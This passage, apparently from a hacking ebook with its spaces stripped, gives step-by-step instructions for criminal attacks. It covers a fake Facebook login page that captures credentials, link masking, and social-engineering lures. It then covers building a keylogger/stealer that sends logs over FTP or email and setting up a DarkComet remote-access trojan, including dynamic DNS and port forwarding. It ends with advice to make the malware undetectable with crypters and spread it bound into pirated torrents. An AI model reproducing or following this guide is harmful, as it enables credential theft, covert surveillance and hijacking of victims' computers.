Thiswillgiveyoutheftplinkbutweneedtogetthehttp link,followthis. ftp:ftp://user@domain/fileteh/action.php togetthehttplinnkremoveeverythingbeforethe@ includingthe@.Alsoifinthelinkthereisreferenceto "public_html"removeit. Somyhttplinkwillbe:http://domain/fileteh/action.php eBacktothepagecode;weneedtosearchthecodefor thepartabouttheloginformmorespecificlyforthecode thatsendstherequesttotheserver.ForFacebooksearch thecodefor: action="https://www.facebook.com/login.php? login_attempt=1"

Makesurethiscodeisintheform"login_form".

Nowreplacethelinkafteraction="withyourphpfilelink ("http://domain/fileteh/action.php")

fObfuscatethenupload.Toobfuscateyourcodegoto http://htmlobfuscator.com/thencopyallthemodified html(webpage)codetofromnotepadtothewebsiteand clickobfuscatethencopytheobfuscatedcodeandplaceit innotepadthensaveitassomething.html

Anduploadyourhtmlfilethesamewayyoudidforthe phpfilethengetthehttpurl. gSettingpermissions,infilezillarightclickthetwofile andclick"Fileperomissons..."thenchangeit777andclick

"ok". hTesting:finallyyouarereadytotestthepage.Goto thehtmlpageyouuploaded(notthephppage)andit shouldlookjustlikefacebook.

Writeanyusernameandpasswordthenpressloginthe pagewillthenredirectyou(Youcanchangeredirection pageinthephpfileseestep"c").ThenrefreshFilezillaang anewtxtfileshouldbetherewiththeusernameand passwordinside.

Extra: Maskingthelink:Ifyoulinklookstoosuspiciousthenyou canmaskit.Thatisveryeasygotowww.dot.tkandselect anewURLname.

Theninthe"Forwardthisdomainto"insertthelinktothe sakepage.

Nowyoucansendthe.tklinkandtheywillberedirected tothefakepage. Spreading:HerecomestheSEpart.Youneedtotrickto loginwithyourfakepage,youcantellthemtheywillget freefacebookgoldorfreelikesorjusttellthemitisanew versionoffacebookwithlotsofnewstuffs;youwont believehowstupidsomepeoplearesojustcomeupwith astoryandmakethemloginusingthefakepage.

THEEND

bKeyloggers 1Whatisakeylogger? Akeyloggerruninsilentmod(hidden)ontheslave'spc andwillrecordallpressedkeysinadditionto screenshots/webcameandthensendthelogstothe hacker.Keyloggersareusedtostealpasswordsorspyon comversationsanduser'sactivities. 2HowtosetupaStealer+Logger? Iwillbeusing"UnknownLoggerPublicV1.5"locatedin theFilesfolderunderthename:"UnknownLoggerPublic V1.5.rar"
(Creditsgoesforunknownsfromhackforums.netforthatgreatfreelogger.)

Thisloggerhas2deliveryoption:ByemailorbyFTP,I recommendusingftpasitismorestableoruseafake emailsoifyouaretracedtotheemailtheywontgetyour realone. 1)UsingFTP: Firstlogintoyourftpaccount(Youcanseedetailsonhow tocreateoneinthepreviouspart"Phishing")usingFilezilla thencreateatextfileanduploadit,letsnameit"logs.txt"

NowintheLoggerfillintheinformationwithusername, passwordoftheftp,andfortheURLgotoFilezillaand copytheURLofthe"logs.txt"

Fortheemaildelivery:

IrecommendGmail.Enteryouremail,password,choose "smtp.gmail.com",thenentertheemailaddresstosend thelogsfor.(Don'ttouchtheport) Testingthedelivery: ForbothemailandFTPclickthe"Send:Tags Explanation/Test"button,ifeverythingisokyouwillsee thismessage.(maytakelike1minutemaxifyouhaveslow internetconnection)

Ifyouchekyourlogsfileoryouremailyoushouldgetthis.

ThenextstepisconfiguringtheLoggerandStealer.First fortheLogger,thereisthe"SendLogs"optionifyouleave it1thismeanstheloggerswillsendthelogsevery1min,i recommendevery2or3minbutitisuptoyou.Thename issimplythenameofthevirus.Nowclickthe"Settings" buttonandcheck"RunonStartUp"inthe"Extras".

NowfortheStealer,simplycheckeverythinginthe "Stealers"tabin"Settings".(Youcancheckonly1or2 optionsifyoudon'twanttheothers) Thathowitshouldlook.

Nowgiveitanamethenclick"Build"(willbebuildinthe samelocationasthebuilder). 3Spreading Ifyouwanttospreadyourkeyloggersuccessfullyyouwill needtomakeitFUD(FullyUnDetectable)sothatitisnot detectedanddeletedbyAV.Todothisyouwillneeda FUDcrypterIdidnotincludeonewiththebookbecausea privateFUDcrypterwillcostyoumoney.

Yournextstepistofindsomeplacetospreaditone, usuallytorrentsarethebestfindanewfresh prgram/game/crack/movie...downloadit,useabinderto bindthefilewithyourkeyloggerandstartspreading. Youcanalsouseextensionspooferifyouarespreading thekeyloggerwithoutbindingitwithanotherapplication, thiswillmakeitlooklesssuspecious.

cRemoteAdministratorTools 1WhatisaRAT? RATstandforRemoteAdministratorToolorRemote accessTrojan,itamalwareprogramthatwouldgivethe hackeraccesstothevictim'scomputer.RATusuallyspread intorrentsandpirated/fakesoftwares.Asysteminfected byaRATispartofaninfectednetworkcalledbotnet.A botnetcanhaveseveralgoals,mostcommon: money DDOS(Attackswebsites) 2HowtosetupDarkCometRAT? Darkcometisoneofthebestfree(public)RATs,butasa publicRATitiseaslydetectedbyAVsoconsiderusinga crypter. GeneralideaonhowtheRATwillwork:Thereistwopart inaRAT,aclientandaserver;Theserverissenttothe victimtoinfectthecomputer,thentheserverwilltryto establishaconnectionwiththeclient.Theclientreceive theconnectionandcommunicatebackwiththehacker's commands.Itisverysimilartomultiplayergamesaperson createagame(Client)andtheotherplayersconnecttoit

(server). TheserverwillneedandIPaddressandaporttoconnect totheclient,assomeofusdon'thaveauniqueIP(IPcan changeeverytimeyouconnecttotheinternet)wewilluse aDNShost.ThismeantheserverwillconnecttotheDNS hostthenwillberedirectedtoyourIP,andyoucanupdate yourDNShosteverytimeyourIPchange. Whatislefttodoisportforwardingyourrouter,this meansopenporttoallowtheservertoconnect. a)NoipDNShost TogetafreeDNShost,weneedtosignupatwww.no ip.com,onceyousignupgoonandlogintoyouraccount. Thenclickon"AddaHost".

EnterahostnameandleavethehosttypetoDNSHost(A) thenclick"CreateHost".

Nowweneedtodownloadnoipclientsowecanupdate theIPfastandeasy.Todosoclickon"DownloadClient"in theleftpanel.

b)Creatingtheserver. YoumustknowthatDarkcometisaRATandwillbe detectedbyyourAVsoturnitofforadddarkcomettothe exeptionslist. Gotothe"Files"folderprovidedwiththisebookand extract"DarkCometRAT531.zip"openthefolderthenrun "DarkComet.exe"acceptthetermsandyougoodtogo.

Tocreatetheservergoto:DarkCometRAT>Server module(657.50Kb)>Minimalist(quick)orifyouwantto fullycostumizetheserverchooseFulleditor(expert)

Setthesettingasshowsintheabovepicture,youhaveto change"IP/DNS"tothenoipDNShostyourcreated earlier;youcanalsochangetheportandtheiconifyou want.Nowclicknormaltobuildtheserve. c)Letsopensomeports. Beforewecanstartlisteningforconnectionsweneedto opentheportweusedfortherserverinmycase"1604". ThiscanbeveryifyourroutersupportUpNP,anyway followthesesteps: GotoSocket/NettabinDarkComet,thenrighclickand addport.

Enteryourportnumberandmakesure"Trytoforward automaticaly(UpNP)"ischecked,thenclick"Listen".

Nowweneedtocheckiftheportisopen,todosogoto: www.canyouseeme.org,enteryourportnumbeandclick "CheckYourPort"ifyougetSuccessthenyouaregoodto goandtheportisopen.

4onlyifautomaticforwarddidn'twork. Ifthepreviousmethoddidn'tworkandyougota connectionerrorfromcanyouseeme.orgtherefertothis websiteandchooseyourroutermodeltoportforward

yourroutermanually(itisprettyeasy): http://portforward.com/routers.htm d)Listening Forconnectiononaspecifiqueportallyouneedtodois gotoSocket/Nettabandaddaport(Sameasinthe previousstep)andifyouprotectedyourserverconnection withapassword(canbeusedonlyinFulleditormode)go toDarkCometRAT>Clientsetting>Generalsettingsand enterthepasswordin"Trafficencryptionmergedkey (password)"

e)Testing Finalstepistotestifeverythingisworking,sogocreatea serverandremoveandoptionthatcouldharmyour computerthenruntheserveronyourselfandlistenfor connections,asecondslateryourcomputershouldappear inthe"Users"tab.

TouninstalltheRATfromyourmachinerightclickthe user>UninstallServer(s)

3Spreading(Sameasforthekeylogger) You will need to makeitFUD (Fully UnDetectable) so thatitisnotdetectedanddeletedbyAV.Todothisyou willneedaFUDcrypterIdidnotincludeonewiththebook becauseaprivateFUDcrypterwillcostyoumoney. Yournextstepistofindsomeplacetospreaditone, usuallytorrentsarethebestfindanewfresh prgram/game/crack/movie...downloadit,useabinderto bindthefilewithyourRATserverandstartspreading. Youcanalsouseextensionspooferifyouarespreading theserverwithoutbindingitwithanotherapplication,this willmakeitlooklesssuspecious.